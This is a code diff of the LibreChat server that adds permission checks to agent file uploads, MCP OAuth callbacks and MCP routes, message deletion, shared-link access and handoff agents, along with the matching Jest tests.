accessRoleId: AccessRoleIds.AGENT_VIEWER,
|
||||||
|
grantedBy: authorId,
|
||||||
|
});
|
||||||
|
|
||||||
|
const app = createAppWithUser(otherUserId);
|
||||||
|
const response = await request(app).post('/images').send({
|
||||||
|
endpoint: 'agents',
|
||||||
|
agent_id: agentCustomId,
|
||||||
|
tool_resource: 'context',
|
||||||
|
message_file: true,
|
||||||
|
file_id: uuidv4(),
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(response.status).toBe(200);
|
||||||
|
expect(processAgentFileUpload).toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should allow message_file attachment (string "true") without EDIT permission', async () => {
|
||||||
|
const agent = await createAgent({
|
||||||
|
id: agentCustomId,
|
||||||
|
name: 'Test Agent',
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
author: authorId,
|
||||||
|
});
|
||||||
|
|
||||||
|
const { grantPermission } = require('~/server/services/PermissionService');
|
||||||
|
await grantPermission({
|
||||||
|
principalType: PrincipalType.USER,
|
||||||
|
principalId: otherUserId,
|
||||||
|
resourceType: ResourceType.AGENT,
|
||||||
|
resourceId: agent._id,
|
||||||
|
accessRoleId: AccessRoleIds.AGENT_VIEWER,
|
||||||
|
grantedBy: authorId,
|
||||||
|
});
|
||||||
|
|
||||||
|
const app = createAppWithUser(otherUserId);
|
||||||
|
const response = await request(app).post('/images').send({
|
||||||
|
endpoint: 'agents',
|
||||||
|
agent_id: agentCustomId,
|
||||||
|
tool_resource: 'context',
|
||||||
|
message_file: 'true',
|
||||||
|
file_id: uuidv4(),
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(response.status).toBe(200);
|
||||||
|
expect(processAgentFileUpload).toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should deny upload when message_file is false (not a message attachment)', async () => {
|
||||||
|
const agent = await createAgent({
|
||||||
|
id: agentCustomId,
|
||||||
|
name: 'Test Agent',
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
author: authorId,
|
||||||
|
});
|
||||||
|
|
||||||
|
const { grantPermission } = require('~/server/services/PermissionService');
|
||||||
|
await grantPermission({
|
||||||
|
principalType: PrincipalType.USER,
|
||||||
|
principalId: otherUserId,
|
||||||
|
resourceType: ResourceType.AGENT,
|
||||||
|
resourceId: agent._id,
|
||||||
|
accessRoleId: AccessRoleIds.AGENT_VIEWER,
|
||||||
|
grantedBy: authorId,
|
||||||
|
});
|
||||||
|
|
||||||
|
const app = createAppWithUser(otherUserId);
|
||||||
|
const response = await request(app).post('/images').send({
|
||||||
|
endpoint: 'agents',
|
||||||
|
agent_id: agentCustomId,
|
||||||
|
tool_resource: 'context',
|
||||||
|
message_file: false,
|
||||||
|
file_id: uuidv4(),
|
||||||
|
});
|
||||||
|
|
||||||
|
expect(response.status).toBe(403);
|
||||||
|
expect(response.body.error).toBe('Forbidden');
|
||||||
|
expect(processAgentFileUpload).not.toHaveBeenCalled();
|
||||||
|
expect(fs.promises.unlink).toHaveBeenCalledWith('/tmp/t.png');
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
@ -2,12 +2,15 @@ const path = require('path');
|
||||||
const fs = require('fs').promises;
|
const fs = require('fs').promises;
|
||||||
const express = require('express');
|
const express = require('express');
|
||||||
const { logger } = require('@librechat/data-schemas');
|
const { logger } = require('@librechat/data-schemas');
|
||||||
|
const { verifyAgentUploadPermission } = require('@librechat/api');
|
||||||
const { isAssistantsEndpoint } = require('librechat-data-provider');
|
const { isAssistantsEndpoint } = require('librechat-data-provider');
|
||||||
const {
|
const {
|
||||||
processAgentFileUpload,
|
processAgentFileUpload,
|
||||||
processImageFile,
|
processImageFile,
|
||||||
filterFile,
|
filterFile,
|
||||||
} = require('~/server/services/Files/process');
|
} = require('~/server/services/Files/process');
|
||||||
|
const { checkPermission } = require('~/server/services/PermissionService');
|
||||||
|
const { getAgent } = require('~/models/Agent');
|
||||||
|
|
||||||
const router = express.Router();
|
const router = express.Router();
|
||||||
|
|
||||||
|
|
@ -22,6 +25,16 @@ router.post('/', async (req, res) => {
|
||||||
metadata.file_id = req.file_id;
|
metadata.file_id = req.file_id;
|
||||||
|
|
||||||
if (!isAssistantsEndpoint(metadata.endpoint) && metadata.tool_resource != null) {
|
if (!isAssistantsEndpoint(metadata.endpoint) && metadata.tool_resource != null) {
|
||||||
|
const denied = await verifyAgentUploadPermission({
|
||||||
|
req,
|
||||||
|
res,
|
||||||
|
metadata,
|
||||||
|
getAgent,
|
||||||
|
checkPermission,
|
||||||
|
});
|
||||||
|
if (denied) {
|
||||||
|
return;
|
||||||
|
}
|
||||||
return await processAgentFileUpload({ req, res, metadata });
|
return await processAgentFileUpload({ req, res, metadata });
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
|
||||||
|
|
@ -13,6 +13,7 @@ const {
|
||||||
MCPOAuthHandler,
|
MCPOAuthHandler,
|
||||||
MCPTokenStorage,
|
MCPTokenStorage,
|
||||||
setOAuthSession,
|
setOAuthSession,
|
||||||
|
PENDING_STALE_MS,
|
||||||
getUserMCPAuthMap,
|
getUserMCPAuthMap,
|
||||||
validateOAuthCsrf,
|
validateOAuthCsrf,
|
||||||
OAUTH_CSRF_COOKIE,
|
OAUTH_CSRF_COOKIE,
|
||||||
|
|
@ -49,6 +50,18 @@ const router = Router();
|
||||||
|
|
||||||
const OAUTH_CSRF_COOKIE_PATH = '/api/mcp';
|
const OAUTH_CSRF_COOKIE_PATH = '/api/mcp';
|
||||||
|
|
||||||
|
const checkMCPUsePermissions = generateCheckAccess({
|
||||||
|
permissionType: PermissionTypes.MCP_SERVERS,
|
||||||
|
permissions: [Permissions.USE],
|
||||||
|
getRoleByName,
|
||||||
|
});
|
||||||
|
|
||||||
|
const checkMCPCreate = generateCheckAccess({
|
||||||
|
permissionType: PermissionTypes.MCP_SERVERS,
|
||||||
|
permissions: [Permissions.USE, Permissions.CREATE],
|
||||||
|
getRoleByName,
|
||||||
|
});
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Get all MCP tools available to the user
|
* Get all MCP tools available to the user
|
||||||
* Returns only MCP tools, completely decoupled from regular LibreChat tools
|
* Returns only MCP tools, completely decoupled from regular LibreChat tools
|
||||||
|
|
@ -91,7 +104,11 @@ router.get('/:serverName/oauth/initiate', requireJwtAuth, setOAuthSession, async
|
||||||
}
|
}
|
||||||
|
|
||||||
const oauthHeaders = await getOAuthHeaders(serverName, userId);
|
const oauthHeaders = await getOAuthHeaders(serverName, userId);
|
||||||
const { authorizationUrl, flowId: oauthFlowId } = await MCPOAuthHandler.initiateOAuthFlow(
|
const {
|
||||||
|
authorizationUrl,
|
||||||
|
flowId: oauthFlowId,
|
||||||
|
flowMetadata,
|
||||||
|
} = await MCPOAuthHandler.initiateOAuthFlow(
|
||||||
serverName,
|
serverName,
|
||||||
serverUrl,
|
serverUrl,
|
||||||
userId,
|
userId,
|
||||||
|
|
@ -101,6 +118,7 @@ router.get('/:serverName/oauth/initiate', requireJwtAuth, setOAuthSession, async
|
||||||
|
|
||||||
logger.debug('[MCP OAuth] OAuth flow initiated', { oauthFlowId, authorizationUrl });
|
logger.debug('[MCP OAuth] OAuth flow initiated', { oauthFlowId, authorizationUrl });
|
||||||
|
|
||||||
|
await MCPOAuthHandler.storeStateMapping(flowMetadata.state, oauthFlowId, flowManager);
|
||||||
setOAuthCsrfCookie(res, oauthFlowId, OAUTH_CSRF_COOKIE_PATH);
|
setOAuthCsrfCookie(res, oauthFlowId, OAUTH_CSRF_COOKIE_PATH);
|
||||||
res.redirect(authorizationUrl);
|
res.redirect(authorizationUrl);
|
||||||
} catch (error) {
|
} catch (error) {
|
||||||
|
|
@ -143,31 +161,53 @@ router.get('/:serverName/oauth/callback', async (req, res) => {
|
||||||
return res.redirect(`${basePath}/oauth/error?error=missing_state`);
|
return res.redirect(`${basePath}/oauth/error?error=missing_state`);
|
||||||
}
|
}
|
||||||
|
|
||||||
const flowId = state;
|
const flowsCache = getLogStores(CacheKeys.FLOWS);
|
||||||
logger.debug('[MCP OAuth] Using flow ID from state', { flowId });
|
const flowManager = getFlowStateManager(flowsCache);
|
||||||
|
|
||||||
|
const flowId = await MCPOAuthHandler.resolveStateToFlowId(state, flowManager);
|
||||||
|
if (!flowId) {
|
||||||
|
logger.error('[MCP OAuth] Could not resolve state to flow ID', { state });
|
||||||
|
return res.redirect(`${basePath}/oauth/error?error=invalid_state`);
|
||||||
|
}
|
||||||
|
logger.debug('[MCP OAuth] Resolved flow ID from state', { flowId });
|
||||||
|
|
||||||
const flowParts = flowId.split(':');
|
const flowParts = flowId.split(':');
|
||||||
if (flowParts.length < 2 || !flowParts[0] || !flowParts[1]) {
|
if (flowParts.length < 2 || !flowParts[0] || !flowParts[1]) {
|
||||||
logger.error('[MCP OAuth] Invalid flow ID format in state', { flowId });
|
logger.error('[MCP OAuth] Invalid flow ID format', { flowId });
|
||||||
return res.redirect(`${basePath}/oauth/error?error=invalid_state`);
|
return res.redirect(`${basePath}/oauth/error?error=invalid_state`);
|
||||||
}
|
}
|
||||||
|
|
||||||
const [flowUserId] = flowParts;
|
const [flowUserId] = flowParts;
|
||||||
if (
|
|
||||||
!validateOAuthCsrf(req, res, flowId, OAUTH_CSRF_COOKIE_PATH) &&
|
const hasCsrf = validateOAuthCsrf(req, res, flowId, OAUTH_CSRF_COOKIE_PATH);
|
||||||
!validateOAuthSession(req, flowUserId)
|
const hasSession = !hasCsrf && validateOAuthSession(req, flowUserId);
|
||||||
) {
|
let hasActiveFlow = false;
|
||||||
logger.error('[MCP OAuth] CSRF validation failed: no valid CSRF or session cookie', {
|
if (!hasCsrf && !hasSession) {
|
||||||
|
const pendingFlow = await flowManager.getFlowState(flowId, 'mcp_oauth');
|
||||||
|
const pendingAge = pendingFlow?.createdAt ? Date.now() - pendingFlow.createdAt : Infinity;
|
||||||
|
hasActiveFlow = pendingFlow?.status === 'PENDING' && pendingAge < PENDING_STALE_MS;
|
||||||
|
if (hasActiveFlow) {
|
||||||
|
logger.debug(
|
||||||
|
'[MCP OAuth] CSRF/session cookies absent, validating via active PENDING flow',
|
||||||
|
{
|
||||||
|
flowId,
|
||||||
|
},
|
||||||
|
);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!hasCsrf && !hasSession && !hasActiveFlow) {
|
||||||
|
logger.error(
|
||||||
|
'[MCP OAuth] CSRF validation failed: no valid CSRF cookie, session cookie, or active flow',
|
||||||
|
{
|
||||||
flowId,
|
flowId,
|
||||||
hasCsrfCookie: !!req.cookies?.[OAUTH_CSRF_COOKIE],
|
hasCsrfCookie: !!req.cookies?.[OAUTH_CSRF_COOKIE],
|
||||||
hasSessionCookie: !!req.cookies?.[OAUTH_SESSION_COOKIE],
|
hasSessionCookie: !!req.cookies?.[OAUTH_SESSION_COOKIE],
|
||||||
});
|
},
|
||||||
|
);
|
||||||
return res.redirect(`${basePath}/oauth/error?error=csrf_validation_failed`);
|
return res.redirect(`${basePath}/oauth/error?error=csrf_validation_failed`);
|
||||||
}
|
}
|
||||||
|
|
||||||
const flowsCache = getLogStores(CacheKeys.FLOWS);
|
|
||||||
const flowManager = getFlowStateManager(flowsCache);
|
|
||||||
|
|
||||||
logger.debug('[MCP OAuth] Getting flow state for flowId: ' + flowId);
|
logger.debug('[MCP OAuth] Getting flow state for flowId: ' + flowId);
|
||||||
const flowState = await MCPOAuthHandler.getFlowState(flowId, flowManager);
|
const flowState = await MCPOAuthHandler.getFlowState(flowId, flowManager);
|
||||||
|
|
||||||
|
|
@ -281,7 +321,13 @@ router.get('/:serverName/oauth/callback', async (req, res) => {
|
||||||
const toolFlowId = flowState.metadata?.toolFlowId;
|
const toolFlowId = flowState.metadata?.toolFlowId;
|
||||||
if (toolFlowId) {
|
if (toolFlowId) {
|
||||||
logger.debug('[MCP OAuth] Completing tool flow', { toolFlowId });
|
logger.debug('[MCP OAuth] Completing tool flow', { toolFlowId });
|
||||||
await flowManager.completeFlow(toolFlowId, 'mcp_oauth', tokens);
|
const completed = await flowManager.completeFlow(toolFlowId, 'mcp_oauth', tokens);
|
||||||
|
if (!completed) {
|
||||||
|
logger.warn(
|
||||||
|
'[MCP OAuth] Tool flow state not found during completion — waiter will time out',
|
||||||
|
{ toolFlowId },
|
||||||
|
);
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
/** Redirect to success page with flowId and serverName */
|
/** Redirect to success page with flowId and serverName */
|
||||||
|
|
@ -436,7 +482,12 @@ router.post('/oauth/cancel/:serverName', requireJwtAuth, async (req, res) => {
|
||||||
* Reinitialize MCP server
|
* Reinitialize MCP server
|
||||||
* This endpoint allows reinitializing a specific MCP server
|
* This endpoint allows reinitializing a specific MCP server
|
||||||
*/
|
*/
|
||||||
router.post('/:serverName/reinitialize', requireJwtAuth, setOAuthSession, async (req, res) => {
|
router.post(
|
||||||
|
'/:serverName/reinitialize',
|
||||||
|
requireJwtAuth,
|
||||||
|
checkMCPUsePermissions,
|
||||||
|
setOAuthSession,
|
||||||
|
async (req, res) => {
|
||||||
try {
|
try {
|
||||||
const { serverName } = req.params;
|
const { serverName } = req.params;
|
||||||
const user = createSafeUser(req.user);
|
const user = createSafeUser(req.user);
|
||||||
|
|
@ -498,7 +549,8 @@ router.post('/:serverName/reinitialize', requireJwtAuth, setOAuthSession, async
|
||||||
logger.error('[MCP Reinitialize] Unexpected error', error);
|
logger.error('[MCP Reinitialize] Unexpected error', error);
|
||||||
res.status(500).json({ error: 'Internal server error' });
|
res.status(500).json({ error: 'Internal server error' });
|
||||||
}
|
}
|
||||||
});
|
},
|
||||||
|
);
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Get connection status for all MCP servers
|
* Get connection status for all MCP servers
|
||||||
|
|
@ -605,7 +657,7 @@ router.get('/connection/status/:serverName', requireJwtAuth, async (req, res) =>
|
||||||
* Check which authentication values exist for a specific MCP server
|
* Check which authentication values exist for a specific MCP server
|
||||||
* This endpoint returns only boolean flags indicating if values are set, not the actual values
|
* This endpoint returns only boolean flags indicating if values are set, not the actual values
|
||||||
*/
|
*/
|
||||||
router.get('/:serverName/auth-values', requireJwtAuth, async (req, res) => {
|
router.get('/:serverName/auth-values', requireJwtAuth, checkMCPUsePermissions, async (req, res) => {
|
||||||
try {
|
try {
|
||||||
const { serverName } = req.params;
|
const { serverName } = req.params;
|
||||||
const user = req.user;
|
const user = req.user;
|
||||||
|
|
@ -662,19 +714,6 @@ async function getOAuthHeaders(serverName, userId) {
|
||||||
MCP Server CRUD Routes (User-Managed MCP Servers)
|
MCP Server CRUD Routes (User-Managed MCP Servers)
|
||||||
*/
|
*/
|
||||||
|
|
||||||
// Permission checkers for MCP server management
|
|
||||||
const checkMCPUsePermissions = generateCheckAccess({
|
|
||||||
permissionType: PermissionTypes.MCP_SERVERS,
|
|
||||||
permissions: [Permissions.USE],
|
|
||||||
getRoleByName,
|
|
||||||
});
|
|
||||||
|
|
||||||
const checkMCPCreate = generateCheckAccess({
|
|
||||||
permissionType: PermissionTypes.MCP_SERVERS,
|
|
||||||
permissions: [Permissions.USE, Permissions.CREATE],
|
|
||||||
getRoleByName,
|
|
||||||
});
|
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Get list of accessible MCP servers
|
* Get list of accessible MCP servers
|
||||||
* @route GET /api/mcp/servers
|
* @route GET /api/mcp/servers
|
||||||
|
|
|
||||||
|
|
@ -404,8 +404,8 @@ router.put('/:conversationId/:messageId/feedback', validateMessageReq, async (re
|
||||||
|
|
||||||
router.delete('/:conversationId/:messageId', validateMessageReq, async (req, res) => {
|
router.delete('/:conversationId/:messageId', validateMessageReq, async (req, res) => {
|
||||||
try {
|
try {
|
||||||
const { messageId } = req.params;
|
const { conversationId, messageId } = req.params;
|
||||||
await deleteMessages({ messageId });
|
await deleteMessages({ messageId, conversationId, user: req.user.id });
|
||||||
res.status(204).send();
|
res.status(204).send();
|
||||||
} catch (error) {
|
} catch (error) {
|
||||||
logger.error('Error deleting message:', error);
|
logger.error('Error deleting message:', error);
|
||||||
|
|
|
||||||
|
|
@ -19,9 +19,7 @@ const allowSharedLinks =
|
||||||
process.env.ALLOW_SHARED_LINKS === undefined || isEnabled(process.env.ALLOW_SHARED_LINKS);
|
process.env.ALLOW_SHARED_LINKS === undefined || isEnabled(process.env.ALLOW_SHARED_LINKS);
|
||||||
|
|
||||||
if (allowSharedLinks) {
|
if (allowSharedLinks) {
|
||||||
const allowSharedLinksPublic =
|
const allowSharedLinksPublic = isEnabled(process.env.ALLOW_SHARED_LINKS_PUBLIC);
|
||||||
process.env.ALLOW_SHARED_LINKS_PUBLIC === undefined ||
|
|
||||||
isEnabled(process.env.ALLOW_SHARED_LINKS_PUBLIC);
|
|
||||||
router.get(
|
router.get(
|
||||||
'/:shareId',
|
'/:shareId',
|
||||||
allowSharedLinksPublic ? (req, res, next) => next() : requireJwtAuth,
|
allowSharedLinksPublic ? (req, res, next) => next() : requireJwtAuth,
|
||||||
|
|
|
||||||
|
|
@ -1,6 +1,7 @@
|
||||||
const { logger } = require('@librechat/data-schemas');
|
const { logger } = require('@librechat/data-schemas');
|
||||||
const { initializeAgent, validateAgentModel } = require('@librechat/api');
|
const { initializeAgent, validateAgentModel } = require('@librechat/api');
|
||||||
const { loadAddedAgent, setGetAgent, ADDED_AGENT_ID } = require('~/models/loadAddedAgent');
|
const { loadAddedAgent, setGetAgent, ADDED_AGENT_ID } = require('~/models/loadAddedAgent');
|
||||||
|
const { filterFilesByAgentAccess } = require('~/server/services/Files/permissions');
|
||||||
const { getConvoFiles } = require('~/models/Conversation');
|
const { getConvoFiles } = require('~/models/Conversation');
|
||||||
const { getAgent } = require('~/models/Agent');
|
const { getAgent } = require('~/models/Agent');
|
||||||
const db = require('~/models');
|
const db = require('~/models');
|
||||||
|
|
@ -55,16 +56,16 @@ const processAddedConvo = async ({
|
||||||
userMCPAuthMap,
|
userMCPAuthMap,
|
||||||
}) => {
|
}) => {
|
||||||
const addedConvo = endpointOption.addedConvo;
|
const addedConvo = endpointOption.addedConvo;
|
||||||
logger.debug('[processAddedConvo] Called with addedConvo:', {
|
|
||||||
hasAddedConvo: addedConvo != null,
|
|
||||||
addedConvoEndpoint: addedConvo?.endpoint,
|
|
||||||
addedConvoModel: addedConvo?.model,
|
|
||||||
addedConvoAgentId: addedConvo?.agent_id,
|
|
||||||
});
|
|
||||||
if (addedConvo == null) {
|
if (addedConvo == null) {
|
||||||
return { userMCPAuthMap };
|
return { userMCPAuthMap };
|
||||||
}
|
}
|
||||||
|
|
||||||
|
logger.debug('[processAddedConvo] Processing added conversation', {
|
||||||
|
model: addedConvo.model,
|
||||||
|
agentId: addedConvo.agent_id,
|
||||||
|
endpoint: addedConvo.endpoint,
|
||||||
|
});
|
||||||
|
|
||||||
try {
|
try {
|
||||||
const addedAgent = await loadAddedAgent({ req, conversation: addedConvo, primaryAgent });
|
const addedAgent = await loadAddedAgent({ req, conversation: addedConvo, primaryAgent });
|
||||||
if (!addedAgent) {
|
if (!addedAgent) {
|
||||||
|
|
@ -108,6 +109,7 @@ const processAddedConvo = async ({
|
||||||
getUserKeyValues: db.getUserKeyValues,
|
getUserKeyValues: db.getUserKeyValues,
|
||||||
getToolFilesByIds: db.getToolFilesByIds,
|
getToolFilesByIds: db.getToolFilesByIds,
|
||||||
getCodeGeneratedFiles: db.getCodeGeneratedFiles,
|
getCodeGeneratedFiles: db.getCodeGeneratedFiles,
|
||||||
|
filterFilesByAgentAccess,
|
||||||
},
|
},
|
||||||
);
|
);
|
||||||
|
|
||||||
|
|
|
||||||
|
|
@ -10,6 +10,8 @@ const {
|
||||||
createSequentialChainEdges,
|
createSequentialChainEdges,
|
||||||
} = require('@librechat/api');
|
} = require('@librechat/api');
|
||||||
const {
|
const {
|
||||||
|
ResourceType,
|
||||||
|
PermissionBits,
|
||||||
EModelEndpoint,
|
EModelEndpoint,
|
||||||
isAgentsEndpoint,
|
isAgentsEndpoint,
|
||||||
getResponseSender,
|
getResponseSender,
|
||||||
|
|
@ -20,7 +22,9 @@ const {
|
||||||
getDefaultHandlers,
|
getDefaultHandlers,
|
||||||
} = require('~/server/controllers/agents/callbacks');
|
} = require('~/server/controllers/agents/callbacks');
|
||||||
const { loadAgentTools, loadToolsForExecution } = require('~/server/services/ToolService');
|
const { loadAgentTools, loadToolsForExecution } = require('~/server/services/ToolService');
|
||||||
|
const { filterFilesByAgentAccess } = require('~/server/services/Files/permissions');
|
||||||
const { getModelsConfig } = require('~/server/controllers/ModelController');
|
const { getModelsConfig } = require('~/server/controllers/ModelController');
|
||||||
|
const { checkPermission } = require('~/server/services/PermissionService');
|
||||||
const AgentClient = require('~/server/controllers/agents/client');
|
const AgentClient = require('~/server/controllers/agents/client');
|
||||||
const { getConvoFiles } = require('~/models/Conversation');
|
const { getConvoFiles } = require('~/models/Conversation');
|
||||||
const { processAddedConvo } = require('./addedConvo');
|
const { processAddedConvo } = require('./addedConvo');
|
||||||
|
|
@ -125,6 +129,7 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => {
|
||||||
toolRegistry: ctx.toolRegistry,
|
toolRegistry: ctx.toolRegistry,
|
||||||
userMCPAuthMap: ctx.userMCPAuthMap,
|
userMCPAuthMap: ctx.userMCPAuthMap,
|
||||||
tool_resources: ctx.tool_resources,
|
tool_resources: ctx.tool_resources,
|
||||||
|
actionsEnabled: ctx.actionsEnabled,
|
||||||
});
|
});
|
||||||
|
|
||||||
logger.debug(`[ON_TOOL_EXECUTE] loaded ${result.loadedTools?.length ?? 0} tools`);
|
logger.debug(`[ON_TOOL_EXECUTE] loaded ${result.loadedTools?.length ?? 0} tools`);
|
||||||
|
|
@ -200,23 +205,19 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => {
|
||||||
getUserCodeFiles: db.getUserCodeFiles,
|
getUserCodeFiles: db.getUserCodeFiles,
|
||||||
getToolFilesByIds: db.getToolFilesByIds,
|
getToolFilesByIds: db.getToolFilesByIds,
|
||||||
getCodeGeneratedFiles: db.getCodeGeneratedFiles,
|
getCodeGeneratedFiles: db.getCodeGeneratedFiles,
|
||||||
|
filterFilesByAgentAccess,
|
||||||
},
|
},
|
||||||
);
|
);
|
||||||
|
|
||||||
logger.debug(
|
logger.debug(
|
||||||
`[initializeClient] Tool definitions for primary agent: ${primaryConfig.toolDefinitions?.length ?? 0}`,
|
`[initializeClient] Storing tool context for ${primaryConfig.id}: ${primaryConfig.toolDefinitions?.length ?? 0} tools, registry size: ${primaryConfig.toolRegistry?.size ?? '0'}`,
|
||||||
);
|
|
||||||
|
|
||||||
/** Store primary agent's tool context for ON_TOOL_EXECUTE callback */
|
|
||||||
logger.debug(`[initializeClient] Storing tool context for agentId: ${primaryConfig.id}`);
|
|
||||||
logger.debug(
|
|
||||||
`[initializeClient] toolRegistry size: ${primaryConfig.toolRegistry?.size ?? 'undefined'}`,
|
|
||||||
);
|
);
|
||||||
agentToolContexts.set(primaryConfig.id, {
|
agentToolContexts.set(primaryConfig.id, {
|
||||||
agent: primaryAgent,
|
agent: primaryAgent,
|
||||||
toolRegistry: primaryConfig.toolRegistry,
|
toolRegistry: primaryConfig.toolRegistry,
|
||||||
userMCPAuthMap: primaryConfig.userMCPAuthMap,
|
userMCPAuthMap: primaryConfig.userMCPAuthMap,
|
||||||
tool_resources: primaryConfig.tool_resources,
|
tool_resources: primaryConfig.tool_resources,
|
||||||
|
actionsEnabled: primaryConfig.actionsEnabled,
|
||||||
});
|
});
|
||||||
|
|
||||||
const agent_ids = primaryConfig.agent_ids;
|
const agent_ids = primaryConfig.agent_ids;
|
||||||
|
|
@ -235,6 +236,22 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => {
|
||||||
return null;
|
return null;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
const hasAccess = await checkPermission({
|
||||||
|
userId: req.user.id,
|
||||||
|
role: req.user.role,
|
||||||
|
resourceType: ResourceType.AGENT,
|
||||||
|
resourceId: agent._id,
|
||||||
|
requiredPermission: PermissionBits.VIEW,
|
||||||
|
});
|
||||||
|
|
||||||
|
if (!hasAccess) {
|
||||||
|
logger.warn(
|
||||||
|
`[processAgent] User ${req.user.id} lacks VIEW access to handoff agent ${agentId}, skipping`,
|
||||||
|
);
|
||||||
|
skippedAgentIds.add(agentId);
|
||||||
|
return null;
|
||||||
|
}
|
||||||
|
|
||||||
const validationResult = await validateAgentModel({
|
const validationResult = await validateAgentModel({
|
||||||
req,
|
req,
|
||||||
res,
|
res,
|
||||||
|
|
@ -269,6 +286,7 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => {
|
||||||
getUserCodeFiles: db.getUserCodeFiles,
|
getUserCodeFiles: db.getUserCodeFiles,
|
||||||
getToolFilesByIds: db.getToolFilesByIds,
|
getToolFilesByIds: db.getToolFilesByIds,
|
||||||
getCodeGeneratedFiles: db.getCodeGeneratedFiles,
|
getCodeGeneratedFiles: db.getCodeGeneratedFiles,
|
||||||
|
filterFilesByAgentAccess,
|
||||||
},
|
},
|
||||||
);
|
);
|
||||||
|
|
||||||
|
|
@ -284,6 +302,7 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => {
|
||||||
toolRegistry: config.toolRegistry,
|
toolRegistry: config.toolRegistry,
|
||||||
userMCPAuthMap: config.userMCPAuthMap,
|
userMCPAuthMap: config.userMCPAuthMap,
|
||||||
tool_resources: config.tool_resources,
|
tool_resources: config.tool_resources,
|
||||||
|
actionsEnabled: config.actionsEnabled,
|
||||||
});
|
});
|
||||||
|
|
||||||
agentConfigs.set(agentId, config);
|
agentConfigs.set(agentId, config);
|
||||||
|
|
@ -312,6 +331,7 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => {
|
||||||
}
|
}
|
||||||
} catch (err) {
|
} catch (err) {
|
||||||
logger.error(`[initializeClient] Error processing agent ${agentId}:`, err);
|
logger.error(`[initializeClient] Error processing agent ${agentId}:`, err);
|
||||||
|
skippedAgentIds.add(agentId);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
@ -321,7 +341,12 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => {
|
||||||
if (checkAgentInit(agentId)) {
|
if (checkAgentInit(agentId)) {
|
||||||
continue;
|
continue;
|
||||||
}
|
}
|
||||||
|
try {
|
||||||
await processAgent(agentId);
|
await processAgent(agentId);
|
||||||
|
} catch (err) {
|
||||||
|
logger.error(`[initializeClient] Error processing chain agent ${agentId}:`, err);
|
||||||
|
skippedAgentIds.add(agentId);
|
||||||
|
}
|
||||||
}
|
}
|
||||||
const chain = await createSequentialChainEdges([primaryConfig.id].concat(agent_ids), '{convo}');
|
const chain = await createSequentialChainEdges([primaryConfig.id].concat(agent_ids), '{convo}');
|
||||||
collectEdges(chain);
|
collectEdges(chain);
|
||||||
|
|
@ -351,6 +376,19 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => {
|
||||||
userMCPAuthMap = updatedMCPAuthMap;
|
userMCPAuthMap = updatedMCPAuthMap;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
for (const [agentId, config] of agentConfigs) {
|
||||||
|
if (agentToolContexts.has(agentId)) {
|
||||||
|
continue;
|
||||||
|
}
|
||||||
|
agentToolContexts.set(agentId, {
|
||||||
|
agent: config,
|
||||||
|
toolRegistry: config.toolRegistry,
|
||||||
|
userMCPAuthMap: config.userMCPAuthMap,
|
||||||
|
tool_resources: config.tool_resources,
|
||||||
|
actionsEnabled: config.actionsEnabled,
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
// Ensure edges is an array when we have multiple agents (multi-agent mode)
|
// Ensure edges is an array when we have multiple agents (multi-agent mode)
|
||||||
// MultiAgentGraph.categorizeEdges requires edges to be iterable
|
// MultiAgentGraph.categorizeEdges requires edges to be iterable
|
||||||
if (agentConfigs.size > 0 && !edges) {
|
if (agentConfigs.size > 0 && !edges) {
|
||||||
|
|
|
||||||
201
api/server/services/Endpoints/agents/initialize.spec.js
Normal file
201
api/server/services/Endpoints/agents/initialize.spec.js
Normal file
|
|
@ -0,0 +1,201 @@
|
||||||
|
const mongoose = require('mongoose');
|
||||||
|
const {
|
||||||
|
ResourceType,
|
||||||
|
PermissionBits,
|
||||||
|
PrincipalType,
|
||||||
|
PrincipalModel,
|
||||||
|
} = require('librechat-data-provider');
|
||||||
|
const { MongoMemoryServer } = require('mongodb-memory-server');
|
||||||
|
|
||||||
|
const mockInitializeAgent = jest.fn();
|
||||||
|
const mockValidateAgentModel = jest.fn();
|
||||||
|
|
||||||
|
jest.mock('@librechat/agents', () => ({
|
||||||
|
...jest.requireActual('@librechat/agents'),
|
||||||
|
createContentAggregator: jest.fn(() => ({
|
||||||
|
contentParts: [],
|
||||||
|
aggregateContent: jest.fn(),
|
||||||
|
})),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('@librechat/api', () => ({
|
||||||
|
...jest.requireActual('@librechat/api'),
|
||||||
|
initializeAgent: (...args) => mockInitializeAgent(...args),
|
||||||
|
validateAgentModel: (...args) => mockValidateAgentModel(...args),
|
||||||
|
GenerationJobManager: { setCollectedUsage: jest.fn() },
|
||||||
|
getCustomEndpointConfig: jest.fn(),
|
||||||
|
createSequentialChainEdges: jest.fn(),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/controllers/agents/callbacks', () => ({
|
||||||
|
createToolEndCallback: jest.fn(() => jest.fn()),
|
||||||
|
getDefaultHandlers: jest.fn(() => ({})),
|
||||||
|
}));
|
||||||
|
|
||||||
|
jest.mock('~/server/services/ToolService', () => ({
|
||||||
|
loadAgentTools: jest.fn(),
|
||||||
|
